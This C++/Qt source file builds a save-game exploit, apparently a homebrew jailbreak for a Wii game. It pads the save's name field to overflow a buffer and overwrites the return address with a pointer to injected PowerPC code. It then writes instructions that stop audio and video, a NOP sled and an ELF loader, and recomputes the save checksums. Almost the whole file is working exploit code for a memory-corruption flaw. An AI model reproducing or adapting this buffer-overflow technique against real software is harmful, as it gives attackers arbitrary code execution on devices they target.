#include <QtCore/QCoreApplication>
#include <QFile>
#include <QtDebug>
#include <QBuffer>
#include <QStringList>
#include <qendian.h>


QByteArray ReadFile( const QString &path )
{
	QFile file( path );
	if( !file.exists() || !file.open( QIODevice::ReadOnly ) )
	{
		qWarning() << "ReadFile -> can't open" << path;
		return QByteArray();
	}
	QByteArray ret = file.readAll();
	file.close();
	return ret;
}

bool WriteFile( const QString &path, const QByteArray &ba )
{
	QFile file( path );
	if( !file.open( QIODevice::WriteOnly | QIODevice::Truncate ) )
	{
		qWarning() << "WriteFile -> can't open" << path;
		return false;
	}
	if( file.write( ba ) != ba.size() )
	{
		file.close();
		qWarning() << "WriteFile -> can't write all the data to" << path;
		return false;
	}
	file.close();
	return true;
}

QByteArray Checksum( QByteArray ba )
{
	quint32 tmp;
	quint32 sum1 = 0;
	quint32 sum2 = 0;

	QBuffer buf( &ba );
	buf.open( QIODevice::ReadWrite );

	buf.seek( 8 );
	for( int i = 2; i < 0x12 * 9; i++ )
	{
		buf.read( (char*)&tmp, 4 );
		sum1 += qFromBigEndian( tmp );
	}

	buf.seek( 8 );
	for( int i = 2; i < 0x32b0 * 4; i++ )//0x32b0 is for USA version
	{
		buf.read( (char*)&tmp, 4 );
		sum2 += qFromBigEndian( tmp );
	}

	qDebug() << "checkSums:" << hex << sum1 << sum2;

	buf.seek( 0 );
	tmp = qFromBigEndian( sum1 );
	buf.write( (const char*)&tmp, 4 );
	tmp = qFromBigEndian( sum2 );
	buf.write( (const char*)&tmp, 4 );

	buf.close();

	return ba;

}

//where is the elf loader going to be in memory?
#define ENTRYPOINT 0x80483ea0

//how many extra instruction do i have before the loader ( for killing audio and shit )
#define NUM_INSTRUCTIONS_BEFORE_LOADER 6

//where do those instructions start?
#define INSTRUCTION_START ( ENTRYPOINT - ( 4 * NUM_INSTRUCTIONS_BEFORE_LOADER ) )
#define NOP 0x60000000

//where doesnt the name in the save start that is being exploited?
#define NAME_OFFSET  0x2936

//how long must the name be?
#define NAME_LEN 0x144

//where am i putting the loader inside the save file?
#define SAVE_LOADER_START 0x2aa0

//where am i putting the instructions before the loader inside the save file?
#define SAVE_INSTRUCTIONS_START ( SAVE_LOADER_START - ( 4 * NUM_INSTRUCTIONS_BEFORE_LOADER ) )

//where in the save file does our return address need to be?
#define RETURN_ADDR_OFFSET ( NAME_OFFSET + NAME_LEN )

int main(int argc, char *argv[])
{
    QCoreApplication a(argc, argv);
	QStringList args = QCoreApplication::arguments();
	if( args.size() < 2 )
	{
		qDebug() << "args" << args;
		return 4;
	}
	QByteArray loader = ReadFile( "./loader/loader.bin" );
	if( loader.isEmpty() )
		return 1;

	QByteArray origSave = ReadFile( "./baseSave/0001000052543445/01.dat" );
	if( origSave.isEmpty() )
		return 2;

	if( origSave.size() < 0x32b00 )
	{
		qDebug() << "size" << hex << origSave.size();
		return 3;
	}

	//overflow the buffer
	for( int i = NAME_OFFSET; i < NAME_OFFSET + NAME_LEN; i++ )
	{
		if( origSave[ i ] == '\0' )
			origSave[ i ] = 1;
	}

	quint32 tmp;
	QBuffer buf( &origSave );
	buf.open( QIODevice::ReadWrite );
	buf.seek( NAME_OFFSET );//write my name in there :)
	buf.write( "Giantpune" );

	//write the address of our code to execute
	buf.seek( RETURN_ADDR_OFFSET );
	tmp = qFromBigEndian( (quint32)INSTRUCTION_START );
	buf.write( (char*)&tmp, 4 );
	qDebug() << "ENTRYPOINT        :" << hex << ENTRYPOINT;
	qDebug() << "RETURN_ADDR_OFFSET:" << hex << INSTRUCTION_START << "@" << hex << RETURN_ADDR_OFFSET;

	//write some code to execute before the elf loader
	buf.seek( SAVE_INSTRUCTIONS_START );
	tmp = qFromBigEndian( (quint32)0x4bc967f1 );//bl audiostop
	buf.write( (char*)&tmp, 4 );
	tmp = qFromBigEndian( (quint32)0x4bcb92f5 );//bl videostop
	buf.write( (char*)&tmp, 4 );
	while( buf.pos() < SAVE_LOADER_START )
	{
		tmp = qFromBigEndian( (quint32)NOP );	//throw in some NOP in case i need to insert more instructions later
		buf.write( (char*)&tmp, 4 );
	}

	buf.seek( SAVE_LOADER_START );				//write the loader
	buf.write( loader );
	buf.close();

	//fix checksums
	QByteArray fixed = Checksum( origSave );

	//output
	WriteFile( args.at( 1 ), fixed );

	qDebug() << "done";

	return 0;
}
